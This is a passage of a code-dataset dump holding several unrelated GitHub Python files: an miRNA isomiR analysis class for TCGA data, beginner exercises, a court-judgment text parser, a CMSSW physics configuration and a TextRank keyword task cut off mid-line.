key).upper().replace('T', 'U')\n if seq_of_table_1 in percursor_sequence:\n nt_index = percursor_sequence.find(seq_of_table_1)\n \n for nt in seq_of_table_1:\n X.append(nt)\n \n i = 1\n while i < len(X)+1:\n Y[nt_index+i-1] = X[i-1]\n i = i + 1\n \n seq_ali.append(\"\".join(Y))\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_sequence_alignment', seq_ali)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n \n os.chdir(ori_path)\n \n return tabT\n \n else:\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n seq_ali = ['na']*len(main_key_list)\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_sequence_alignment', seq_ali)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n \n os.chdir(ori_path)\n \n return tabT\n \n def process3(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #It is broken\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n \n if self.situation == 'OK':\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n mature_miRNA_key_list = [x.lower() for x in C1.mature_miRNA.FastA_dictionary.keys()]\n \n #definite the isomiR type\n ##find 'MIMA'\n in_frame_list = []\n unannotated_list = []\n out_frame_list = []\n for key in main_key_list:\n \n result = tabT.read('miRNA_region', key)\n \n if 'unannotated' in result and [x for x in mature_miRNA_key_list if filter(str.isdigit, self.miRNA) in x] != []:\n unannotated_list.append(key)\n elif result.find('unannotated') == -1:\n if 'MIMA' in result:\n in_frame_list.append(key)\n elif result.find('MIMA') == -1:\n out_frame_list.append(key)\n else:\n print(str(miRNA)+' '+str(key)+' '+'is no value to defind isomiR type')\n quit()\n else:\n print(str(miRNA)+' '+str(key)+' '+'has unexcept type')\n quit()\n \n #print in_frame_list\n \n ##unexcept\n if unannotated_list == []:\n \n ##define miRNA sequence and arm\n miRNA_5p_sequence = {}\n miRNA_3p_sequence = {}\n for key in in_frame_list:\n result = tabT.read('miRNA_region', key)\n Num = result.split(',')[1]\n \n miRNA_ID = \"\".join([x for x in C1.mature_miRNA.FastA_dictionary.keys() if Num in x])\n \n if '5p' in miRNA_ID:\n miRNA_5p_sequence[miRNA_ID] = C1.mature_miRNA.FastA_dictionary[miRNA_ID].replace('T', 'U')\n elif '3p' in miRNA_ID:\n miRNA_3p_sequence[miRNA_ID] = C1.mature_miRNA.FastA_dictionary[miRNA_ID].replace('T', 'U')\n else:\n print(str(self.miRNA)+' '+\"does't find the miNRA arm\")\n quit()\n \n ##define arm group\n miRNA_5p_list = []\n miRNA_3p_list = []\n for key in in_frame_list:\n result = tabT.read('miRNA_region', key)\n Num = result.split(',')[1]\n \n if len(miRNA_5p_sequence.keys()) != 0 and len(miRNA_3p_sequence.keys()) != 0:\n if Num in \"\".join(miRNA_5p_sequence.keys()[0]):\n miRNA_5p_list.append(key)\n elif Num in \"\".join(miRNA_3p_sequence.keys()[0]):\n miRNA_3p_list.append(key)\n else:\n print(str(miRNA_ID)+' '+key+' '+\"can't group in arm group !!\")\n quit()\n \n elif len(miRNA_5p_sequence.keys()) != 0 and len(miRNA_3p_sequence.keys()) == 0:\n if Num in \"\".join(miRNA_5p_sequence.keys()[0]):\n miRNA_5p_list.append(key)\n else:\n print(str(miRNA_ID)+' '+key+' '+\"can't group in arm group !!\")\n quit()\n \n elif len(miRNA_5p_sequence.keys()) == 0 and len(miRNA_3p_sequence.keys()) != 0:\n if Num in \"\".join(miRNA_3p_sequence.keys()[0]):\n miRNA_3p_list.append(key)\n else:\n print(str(miRNA_ID)+' '+key+' '+\"can't group in arm group !!\")\n quit()\n \n else:\n print('The '+self.miRNA+' is fucking shit!')\n quit()\n \n ##define isomiR type\n ###find 0,0 type\n zerozero_5p_type = \"\"\n zerozero_3p_type = \"\"\n zerozero_5p_start_number = 0\n zerozero_5p_end_number = 0\n zerozero_3p_start_number = 0\n zerozero_3p_end_number = 0\n ali_sequence_list = tabT.title_box[tabT.title_dicX['isomiR_sequence_alignment']-1]\n if ali_sequence_list[0] != 'na':\n for ali_sequence in ali_sequence_list:\n \n if len(miRNA_5p_sequence.keys()) != 0 and len(miRNA_3p_sequence.keys()) != 0:\n W5p = miRNA_5p_sequence[miRNA_5p_sequence.keys()[0]]\n W3p = miRNA_3p_sequence[miRNA_3p_sequence.keys()[0]]\n if \"\".join([x for x in ali_sequence.split('.') if x != \"\"]) == W5p:\n zerozero_5p_type = ali_sequence\n \n Array = ali_sequence.split('.')\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_5p_start_number = Array.index(seq_in_array)\n \n Array.reverse()\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_5p_end_number = Array.index(seq_in_array)\n \n elif \"\".join([x for x in ali_sequence.split('.') if x != \"\"]) == W3p:\n zerozero_3p_type = ali_sequence\n \n Array = ali_sequence.split('.')\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_3p_start_number = Array.index(seq_in_array)\n \n Array.reverse()\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_3p_end_number = Array.index(seq_in_array)\n \n else:\n zerozero_5p_type = '....'+W5p+'....'\n zerozero_3p_type = '....'+W3p+'....'\n zerozero_5p_start_number = 4\n zerozero_5p_end_number = 4\n zerozero_3p_start_number = 4\n zerozero_3p_end_number = 4\n \n ###find other type\n isomiR_start_type_dic = {}\n isomiR_end_type_dic = {}\n for key in miRNA_5p_list:\n \n result = tabT.read('isomiR_sequence_alignment', key)\n Array = result.split('.')\n isomiR_start_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_5p_start_number\n \n Array.reverse()\n isomiR_end_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_5p_end_number\n \n for key in miRNA_3p_list:\n \n result = tabT.read('isomiR_sequence_alignment', key)\n Array = result.split('.')\n isomiR_start_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_3p_start_number\n \n Array.reverse()\n isomiR_end_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_3p_end_number\n \n elif len(miRNA_5p_sequence.keys()) != 0 and len(miRNA_3p_sequence.keys()) == 0:\n W5p = miRNA_5p_sequence[miRNA_5p_sequence.keys()[0]]\n if \"\".join([x for x in ali_sequence.split('.') if x != \"\"]) == W5p:\n zerozero_5p_type = ali_sequence\n \n Array = ali_sequence.split('.')\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_5p_start_number = Array.index(seq_in_array)\n \n Array.reverse()\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_5p_end_number = Array.index(seq_in_array)\n else:\n zerozero_5p_type = '....'+W5p+'....'\n zerozero_5p_start_number = 4\n zerozero_5p_end_number = 4\n \n ###find other type\n isomiR_start_type_dic = {}\n isomiR_end_type_dic = {}\n for key in miRNA_5p_list:\n \n result = tabT.read('isomiR_sequence_alignment', key)\n Array = result.split('.')\n isomiR_start_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_5p_start_number\n \n Array.reverse()\n isomiR_end_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_5p_end_number\n \n elif len(miRNA_5p_sequence.keys()) == 0 and len(miRNA_3p_sequence.keys()) != 0:\n W3p = miRNA_3p_sequence[miRNA_3p_sequence.keys()[0]]\n if \"\".join([x for x in ali_sequence.split('.') if x != \"\"]) == W3p:\n zerozero_3p_type = ali_sequence\n \n Array = ali_sequence.split('.')\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_3p_start_number = Array.index(seq_in_array)\n \n Array.reverse()\n seq_in_array = \"\".join([x for x in Array if x != \"\"])\n zerozero_3p_end_number = Array.index(seq_in_array)\n else:\n zerozero_3p_type = '....'+W3p+'....'\n zerozero_3p_start_number = 4\n zerozero_3p_end_number = 4\n \n ###find other type\n isomiR_start_type_dic = {}\n isomiR_end_type_dic = {}\n \n for key in miRNA_3p_list:\n \n result = tabT.read('isomiR_sequence_alignment', key)\n Array = result.split('.')\n isomiR_start_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_3p_start_number\n \n Array.reverse()\n isomiR_end_type_dic[key] = Array.index(\"\".join([x for x in Array if x != \"\"])) - zerozero_3p_end_number\n \n else:\n print('The '+self.miRNA+' is fucking shit!')\n quit()\n \n \n \n ###bulid new dic and list\n isomiR_type_dic = {}\n isomiR_type_list = []\n for key in main_key_list:\n \n if isomiR_start_type_dic.has_key(key) == True:\n isomiR_type_dic[key] = ','.join([str(isomiR_start_type_dic[key]),str(isomiR_end_type_dic[key]*(-1))])\n elif isomiR_start_type_dic.has_key(key) == False:\n isomiR_type_dic[key] = 'non'\n \n for key in main_key_list:\n \n isomiR_type_list.append(isomiR_type_dic[key])\n \n \n \n \n else:\n isomiR_type_list = ['na']*len(main_key_list)\n \n #add the isomiR_type_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n elif unannotated_list != []:\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n isomiR_type_list = ['na']*len(main_key_list)\n \n #add the isomiR_type_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n else:\n print('different type!!')\n quit()\n \n self.isomiR_tabfilewithtitle = tabT\n \n print(str(self.miRNA) + ' is done !! ')\n \n return tabT\n \n else:\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n isomiR_type_list = ['na']*len(main_key_list)\n \n #add the isomiR_type_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n print(str(self.miRNA) + ' is done !! ')\n \n return tabT\n \n def process4(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #It is broken\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 4 !')\n \n if self.situation == 'OK':\n #define the percursor_sequence_h\n miRNA = self.miRNA\n \n percursor_ID_list = [x for x in C1.percursor.FastA_dictionary.keys() if 'hsa' in x]\n E = []\n for percursor_ID in percursor_ID_list:\n \n if miRNA in percursor_ID and [x for x in percursor_ID_list if filter(str.isdigit, miRNA) in x] != []:\n E.append(percursor_ID)\n \n \n if len(E) != 1:\n self.situation = 'NO'\n self.percursor_hairpin = 'na'\n self.percursor_sequence = 'na'\n self.percursor_h_sequence_ali = \"\".join('na')\n print(self.miRNA + \" can't define the percursor_sequence ! 2\")\n \n return tabT\n \n else:\n self.percursor_hairpin = \"\".join(E[0])\n percursor_sequence = C1.percursor.read(\"\".join(E[0]))\n \n print(percursor_sequence)\n \n #take percursor_genome_left and percursor_genome_right\n location = self.genome_sequence.replace('T', 'U').find(percursor_sequence)\n if location != -1:\n self.percursor_genome_left = self.genome_left + location\n self.percursor_genome_right = self.genome_left + len(percursor_sequence)\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n for key in main_key_list:\n E = key.split(':')\n #take the chromosome obj\n os.chdir('/home/tin/Lib/Lib/hg19')\n chromosome = 'obj'\n \n W = \"\".join([x for x in C1.hg_obj_index if str(E[1]).upper() in x and len(x) == len(str(E[1]).upper())]) \n \n if C1.hg_obj_list[C1.hg_obj_index.index(W)] == []:\n chromosome = RaxLib.openFastAfile()\n chromosome.open(C1.hg_obj_name[C1.hg_obj_index.index(W)])\n C1.hg_obj_list[C1.hg_obj_index.index(W)] = chromosome\n print(str(C1.hg_obj_name[C1.hg_obj_index.index(W)])+' is opened !! (' + str(len([x for x in C1.hg_obj_list if x != []])) + '/25)')\n \n else:\n chromosome = C1.hg_obj_list[C1.hg_obj_index.index(W)]\n \n os.chdir(ori_path)\n \n \n genome_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[self.percursor_genome_left-4-1:self.percursor_genome_left+len(percursor_sequence)+4]\n if main_key_list[0].split(':')[-1] == '+':\n genome_sequence = genome_sequence\n elif main_key_list[0].split(':')[-1] == '-':\n genome_sequence = RaxLib.ntComRev(genome_sequence, 'Ucase', 'r')\n self.genome_sequence = genome_sequence.upper().replace('T', 'U')\n \n \n self.situation = 'OK'\n self.percursor_sequence = percursor_sequence\n self.percursor_h_sequence_ali = '....'+percursor_sequence+'....'\n \n return tabT\n \n else:\n self.situation = 'NO'\n self.percursor_sequence = percursor_sequence\n self.percursor_h_sequence_ali = '....'+percursor_sequence+'....'\n print(self.miRNA + \" can't define the percursor_sequence ! 3\")\n \n return tabT\n \n else:\n self.situation = 'NO'\n self.percursor_hairpin = 'na'\n self.percursor_sequence = 'na'\n self.percursor_h_sequence_ali = \"\".join('na')\n self.percursor_genome_left = 0\n self.percursor_genome_right = 0\n \n return tabT\n \n \n return tabT\n \n def process5(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #define miRNA precursor and template\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 5 !')\n if self.situation == 'OK':\n miRNA = self.miRNA\n #define the percursor_sequence_h\n precursor_list = C1.matchtable.title_box[C1.matchtable.title_dicX['precursor']-1]\n precursor = [x for x in precursor_list if miRNA in x and len(x.split(' ')[0]) == len(miRNA)]\n \n if len(precursor) == 1:\n percursor_sequence = C1.percursor.read(\"\".join(precursor))\n \n #take percursor_genome_left and percursor_genome_right\n location = self.genome_sequence.replace('T', 'U').find(percursor_sequence)\n if location != -1:\n self.percursor_genome_left = self.genome_left + location\n self.percursor_genome_right = self.genome_left + len(percursor_sequence)\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n for key in main_key_list:\n E = key.split(':')\n #take the chromosome obj\n os.chdir('/home/tin/Lib/Lib/hg19')\n chromosome = 'obj'\n \n W = \"\".join([x for x in C1.hg_obj_index if str(E[1]).upper() in x and len(x) == len(str(E[1]).upper())]) \n \n if C1.hg_obj_list[C1.hg_obj_index.index(W)] == []:\n chromosome = RaxLib.openFastAfile()\n chromosome.open(C1.hg_obj_name[C1.hg_obj_index.index(W)])\n C1.hg_obj_list[C1.hg_obj_index.index(W)] = chromosome\n print(str(C1.hg_obj_name[C1.hg_obj_index.index(W)])+' is opened !! (' + str(len([x for x in C1.hg_obj_list if x != []])) + '/25)')\n \n else:\n chromosome = C1.hg_obj_list[C1.hg_obj_index.index(W)]\n \n os.chdir(ori_path)\n \n \n genome_sequence = chromosome.read(chromosome.FastA_dictionary.keys()[0])[self.percursor_genome_left-4-1:self.percursor_genome_left+len(percursor_sequence)+4]\n if main_key_list[0].split(':')[-1] == '+':\n genome_sequence = genome_sequence\n elif main_key_list[0].split(':')[-1] == '-':\n genome_sequence = RaxLib.ntComRev(genome_sequence, 'Ucase', 'r')\n self.genome_sequence = genome_sequence.upper().replace('T', 'U')\n \n \n self.situation = 'OK'\n self.percursor_hairpin = \"\".join(precursor)\n self.percursor_sequence = percursor_sequence\n self.percursor_h_sequence_ali = '....'+percursor_sequence+'....'\n \n else:\n self.situation = 'NO'\n self.percursor_hairpin = \"\".join('na')\n self.percursor_sequence = 'na'\n self.percursor_h_sequence_ali = \"\".join('na')\n self.percursor_genome_left = 0\n self.percursor_genome_right = 0\n \n else:\n self.situation = 'NO'\n self.percursor_hairpin = \"\".join('na')\n self.percursor_sequence = 'na'\n self.percursor_h_sequence_ali = \"\".join('na')\n self.percursor_genome_left = 0\n self.percursor_genome_right = 0\n \n return tabT\n \n def process6(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #define mature_start_and_end\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 6 !')\n if self.situation == 'OK':\n \n Array = C1.locationtable.find(self.percursor_hairpin.split(' ')[1]+'_1', 'derives_from')\n for locationtable_key in Array:\n locationtable_miRNAName = C1.locationtable.read('Name_hsaV2',locationtable_key[1])\n \n if '-5p' in locationtable_miRNAName:\n self.mature_5p_start = C1.locationtable.read('start',locationtable_key[1])\n self.mature_5p_end = C1.locationtable.read('end',locationtable_key[1])\n elif '-3p' in locationtable_miRNAName:\n self.mature_3p_start = C1.locationtable.read('start',locationtable_key[1])\n self.mature_3p_end = C1.locationtable.read('end',locationtable_key[1])\n else:\n self.mature_3p_start = C1.locationtable.read('start',locationtable_key[1])\n self.mature_3p_end = C1.locationtable.read('end',locationtable_key[1])\n \n self.situation == 'OK'\n \n else:\n self.situation = 'NO'\n self.mature_3p_start = 0.0\n self.mature_3p_end = 0.0\n self.mature_5p_start = 0.0\n self.mature_5p_end = 0.0\n \n return tabT\n \n def process7(self, tabfilewithtitle = 'table obj', genomedataTCGA = 'dataTCGA obj'): #define isomiR type\n \n ori_path = os.getcwd()\n \n tabT = tabfilewithtitle\n C1 = genomedataTCGA\n print(self.miRNA+' in processing 7 !')\n if self.situation == 'OK':\n \n isomiR_type_dic = {}\n isomiR_type_list = []\n \n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n for key in main_key_list:\n \n key_start = float(key.split(':')[2].split('-')[0])\n key_end = float(key.split(':')[2].split('-')[1])\n \n if key_start >= self.mature_5p_start-7 and key_end <= self.mature_5p_end+7:\n isomiR_type_dic[key] = ((key_start - self.mature_5p_start),(key_end - self.mature_5p_end))\n elif key_start >= self.mature_3p_start-7 and key_end <= self.mature_3p_end+7:\n isomiR_type_dic[key] = ((key_start - self.mature_3p_start),(key_end - self.mature_3p_end))\n else:\n isomiR_type_dic[key] = 'non'\n \n for key in main_key_list:\n isomiR_type_list.append(isomiR_type_dic[key])\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n self.situation = 'OK'\n \n else:\n main_key_list = tabT.title_box[tabT.title_dicX['isoform_coords']-1]\n isomiR_type_list = ['na']*len(main_key_list)\n \n #add the sequence_list to table obj\n tabT.append('X', 'isomiR_type', isomiR_type_list)\n tabT.printtable()\n \n self.isomiR_tabfilewithtitle = tabT\n self.situation = 'NO'\n \n return tabT\n \n #-----------------------------------------------------------------------------------------------\n \n def reportisomiR(self):\n \n display_list = []\n info = ':'.join([self.genome_version, self.genome_chromosome, str(self.genome_left)+'-'+str(self.genome_right), self.genome_strand])\n One_line = '\\t'.join([self.miRNA, info])\n display_list.append(One_line)\n \n Two_line = self.percursor_hairpin_ali\n display_list.append(Two_line)\n \n three_line = self.genome_sequence\n display_list.append(three_line)\n \n main_key_list = self.isomiR_tabfilewithtitle.title_box[self.isomiR_tabfilewithtitle.title_dicX['isoform_coords']-1]\n E = []\n for key in main_key_list:\n result1 = self.isomiR_tabfilewithtitle.read('isomiR_sequence_alignment', key)\n result2 = self.isomiR_tabfilewithtitle.read('read_count', key)\n result3 = self.isomiR_tabfilewithtitle.read('reads_per_million_miRNA_mapped', key)\n result4 = self.isomiR_tabfilewithtitle.read('isomiR_type', key)\n \n E.append('\\t'.join([result1, str(result2), str(result3), result4]))\n four_line = '\\n'.join(E)\n display_list.append(four_line)\n \n five_line = str(self.isomiR_tabfilewithtitle.len_Y)\n display_list.append(five_line)\n \n display = '\\n'.join(display_list)+'\\n'\n print(display)\n \n return display","repo_name":"Raxtion/TCGA_miRNA_exp_assay_module_ready_to_use","sub_path":"reference/Lib/multiprocessing/Raxpy3LibdataTCGA_2013_06_11.py","file_name":"Raxpy3LibdataTCGA_2013_06_11.py","file_ext":"py","file_size_in_byte":41728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"69977296452","text":"alien_0 = {'color':'green','points':5}\nalien_1 = {'color':'yellow','points':10}\nalien_2 = {'color':'red','points':15}\naliens = [alien_0,alien_1,alien_2]\nfor alien in aliens:\n print(alien)\nprint(\"\\n\")\n\n\n# Cria uma lista vazia para armazenar alienigenas\naliens = []\n# Cria 30 alienígenas verdes\nfor alien_number in range(30):\n new_alien = {'color':'green','points':5,'speed':'slow'}\n aliens.append(new_alien)\n# Muda a cor dos três primeiros alienígenas verdes.\nfor alien in aliens[0:3]:\n if alien['color'] == 'green':\n alien['color'] = 'yellow'\n alien['speed'] = 'medium'\n alien['points'] = 10\n elif alien['color'] == 'yellow':\n alien['color'] = 'red'\n alien['speed'] = 'fast'\n alien['points'] = 15\n# Exibe os 5 primeiros alienígenas.\nfor alien in aliens[0:5]:\n print(alien)\nprint(\"...\")","repo_name":"EduardoDevSantos/Curso_Intensivo_python","sub_path":"6_dicionarios/aliens.py","file_name":"aliens.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34366222469","text":"import os\nimport re\n\nparserList = os.listdir('.')\nparserList.remove('get_paper.py')\nparserList.remove('line.py')\nparserList.remove('main.py')\nparserList.remove('reason_judge.py')\nparserList.remove('all.py')\n\nparserList.remove('accu_defe.py')\n\n#forMAC\nparserList.remove('.DS_Store')\nfor f in parserList:\n courtList = os.listdir(f)\n #forMAC\n courtList.remove('.DS_Store')\n for g in courtList:\n path = f+'/'+g\n files = os.listdir(path)\n #forMAC\n files.remove('.DS_Store')\n for f in files:\n fread = open(path+'/'+f ,'r')\n content = fread.read()\n main = content.find('主文')\n content = content[main:]\n fact = content.find('事實')\n reason = content.find('理由')\n reasontype = -1\n if (reason-fact) == 3:\n content = content[reason:]\n reasontype = 1\n elif reason > fact:\n if fact != -1:\n content = content[fact:]\n reasontype = 2\n else:\n content = content[reason:]\n reasontype = 3\n elif fact > reason:\n if reason != -1:\n content = content[reason:]\n reasontype = 3\n else:\n content = content[fact:]\n reasontype = 2\n pattern = '中華民國\\d+年\\d+月\\d+日.*第.+庭.*法官.+?原本無'\n match = re.findall(pattern,content)\n print (f)\n #reason\n reasonContent = ''\n reasonList = []\n if len(match) > 0:\n reasonEnd = content.find(match[0])\n reasonContent = content[:reasonEnd]\n '''\n if reasontype == 1:\n reasonContent = content[:reasonEnd]\n elif reasontype == 2:\n reasonContent = content[:reasonEnd]\n elif reasontype == 3:\n reasonContent = content[:reasonEnd]\n'''\n getreasonList = '(實一、|由一、|。二、|。三、|。四、|。五、|。六、|。七、|。八、|。九、|。十、)'\n numList = re.findall(getreasonList,reasonContent)\n for i in range(len(numList)-1):\n start = reasonContent.find(numList[i])+1\n end = reasonContent.find(numList[i+1])+1\n reasonList.append(reasonContent[start:end])\n reasonContent = reasonContent[end-1:]\n start = reasonContent.find(numList[len(numList)-1])+1\n reasonList.append(reasonContent[start:])\n print (reasonList)\n else:\n print (reasonList)\n #judge\n judgeList = []\n if len(match) > 0:\n judgeContent = match[0]\n judge = judgeContent.find('法官')\n if judgeContent.find('以上') >= 0:\n judgeEnd = judgeContent.find('以上')\n else:\n judgeEnd = judgeContent.find('上')\n judgeContent = judgeContent[judge+2:judgeEnd]\n judgeList = judgeContent.split('法官')\n print (judgeList)\n else:\n print (judgeList)\n","repo_name":"tommy413/IM_project","sub_path":"parser/reason_judge.py","file_name":"reason_judge.py","file_ext":"py","file_size_in_byte":3363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14601073645","text":"# cmsRun test_Worker.py maxEvents=5000 notInPCL=False PCLoutName=PCL_worker.root inputFiles=/store/data/Run2018D/SingleMuon/ALCARECO/SiPixelCalSingleMuon-ForPixelALCARECO_UL2018-v1/230000/F33B7CA6-256A-B34F-9536-7594FBC6F75B.root\n\nimport FWCore.ParameterSet.Config as cms\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\noptions = VarParsing ('analysis')\noptions.register( \"outName\", \"Tree.root\", VarParsing.multiplicity.singleton, VarParsing.varType.string, \"name and path of the Tree output files (without extension)\" )\noptions.register( \"PCLoutName\", \"DQM_Worker.root\", VarParsing.multiplicity.singleton, VarParsing.varType.string, \"name and path of the PCL Worker output files (without extension)\" )\n\noptions.register( \"notInPCL\", False, VarParsing.multiplicity.singleton, VarParsing.varType.bool, \"Is it in PCL or not ?\" )\noptions.parseArguments()\n\nfrom Configuration.Eras.Era_Run2_2018_cff import Run2_2018\n\nprocess = cms.Process(\"LA\", Run2_2018)\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('Configuration.StandardSequences.GeometryRecoDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\n\nprocess.GlobalTag.globaltag = \"120X_dataRun2_v2\" # for CMSSW 12_0_0_pre\n\nprocess.load(\"RecoTracker.Configuration.RecoTracker_cff\")\nprocess.load(\"RecoVertex.BeamSpotProducer.BeamSpot_cff\")\n# https://twiki.cern.ch/twiki/bin/view/CMSPublic/SWGuideFindingBeamSpot\nfrom RecoVertex.BeamSpotProducer.BeamSpot_cff import *\nprocess.offlineBeamSpot = offlineBeamSpot\n\nprocess.load(\"RecoTracker.TrackProducer.TrackRefitters_cff\")\nprocess.load(\"TrackingTools.TransientTrack.TransientTrackBuilder_cfi\")\nprocess.load(\"RecoTracker.MeasurementDet.MeasurementTrackerEventProducer_cfi\")\n\nprocess.MeasurementTrackerEvent.pixelClusterProducer = 'ALCARECOSiPixelCalSingleMuon'\nprocess.MeasurementTrackerEvent.stripClusterProducer = 'ALCARECOSiPixelCalSingleMuon'\nprocess.MeasurementTrackerEvent.inactivePixelDetectorLabels = cms.VInputTag()\nprocess.MeasurementTrackerEvent.inactiveStripDetectorLabels = cms.VInputTag()\n\nprocess.load(\"RecoTracker.TransientTrackingRecHit.TransientTrackingRecHitBuilderWithoutRefit_cfi\")\nprocess.TrackRefitter.src = 'ALCARECOSiPixelCalSingleMuon'\nprocess.TrackRefitter.TrajectoryInEvent = True\n\n\nprocess.load(\"CalibTracker.SiPixelLorentzAngle.SiPixelLorentzAnglePCLWorker_cfi\")\nprocess.SiPixelLorentzAnglePCLWorker.folder = cms.string('AlCaReco/SiPixelLorentzAngleHarvesting/')\nprocess.SiPixelLorentzAnglePCLWorker.fileName = cms.string(options.outName)\nprocess.SiPixelLorentzAnglePCLWorker.notInPCL = cms.bool(options.notInPCL)\n\n\nprocess.DQMoutput = cms.OutputModule(\"DQMRootOutputModule\",\n fileName = cms.untracked.string(options.PCLoutName))\n \nprocess.p = cms.Path(process.offlineBeamSpot*\n process.MeasurementTrackerEvent*\n process.TrackRefitter*\n process.SiPixelLorentzAnglePCLWorker)\n\nprocess.DQMoutput_step = cms.EndPath(process.DQMoutput)\n\nprocess.schedule = cms.Schedule(\n process.p,\n process.DQMoutput_step\n )\n \nprocess.maxEvents = cms.untracked.PSet(\n input = cms.untracked.int32(options.maxEvents)\n)\n \nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(options.inputFiles),\n secondaryFileNames = cms.untracked.vstring()\n)\n\n#process.options.numberOfThreads=cms.untracked.uint32(4)\n","repo_name":"wweiphy/LA","sub_path":"test_Worker.py","file_name":"test_Worker.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7632991624","text":"n, m = map(int, input().split())\nmatrix = [list(input()) for _ in range(n)]\nres = set()\n\ndef bf(cur, x, y, dx, dy):\n temp = int(cur) ** 0.5\n if int(temp) == temp:\n res.add(int(cur))\n x += dx\n y += dy\n if 0 <= x < n and 0 <= y < m:\n cur += matrix[x][y]\n bf(cur, x, y, dx, dy)\n\nif n == 1 and m == 1:\n temp = int(matrix[0][0]) ** 0.5\n print(matrix[0][0] if int(temp) == temp else -1)\nelse:\n for i in range(n):\n for j in range(m):\n for dx in range(n):\n for dy in range(m):\n if dx != 0 or dy != 0:\n bf(matrix[i][j], i, j, dx, dy)\n bf(matrix[i][j], i, j, -dx, dy)\n bf(matrix[i][j], i, j, dx, -dy)\n bf(matrix[i][j], i, j, -dx, -dy)\n print(max(res) if len(res) else -1)","repo_name":"YouTaekJung/Algorithm","sub_path":"Baekjoon/Brute_Force/1025_제곱수_찾기.py","file_name":"1025_제곱수_찾기.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"31747112032","text":"h = int(input(\"Unesite broj molekula vodonika: \"))\r\ns = int(input(\"Unesite broj molekula sumpora: \"))\r\no = int(input(\"Unesite broj molekula kiseonika: \"))\r\n\r\ndef kiselina(h, s, o):\r\n \"\"\"\r\n ulazni parametri: h -> broj molekula vodonika\r\n s -> broj molekula sumpora\r\n o -> broj molekula kiseonika\r\n returns koliko se najvise molekula sumporne kiseline H2SO4 moze dobiti od datih molekula\r\n \"\"\"\r\n broj_kiselina = 0\r\n while h - 2 > 0 and o - 4 > 0 and s - 1 > 0:\r\n broj_kiselina = broj_kiselina + 1\r\n h = h - 2 \r\n s = s - 1\r\n o = o - 4\r\n return broj_kiselina\r\nprint(kiselina(h, s, o))","repo_name":"andjelao/Zbirka2-ostatak-zadataka","sub_path":"str07_zad32.py","file_name":"str07_zad32.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"sh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"37776763181","text":"import time\nfrom textrank4zh import TextRank4Keyword\n\nfrom model.mongo import Mongo\nfrom tasks.celery_app import celery_app\n\n\ndef get_keywords(text):\n if not text:\n return []\n result = []\n tr4w = TextRank4Keyword()\n tr4w.analyze(text=text, lower=True, window=2) # py2中text必须是utf8编码的str或者unicode对象,py3中必须是utf8编码的bytes或者str对象\n for item in 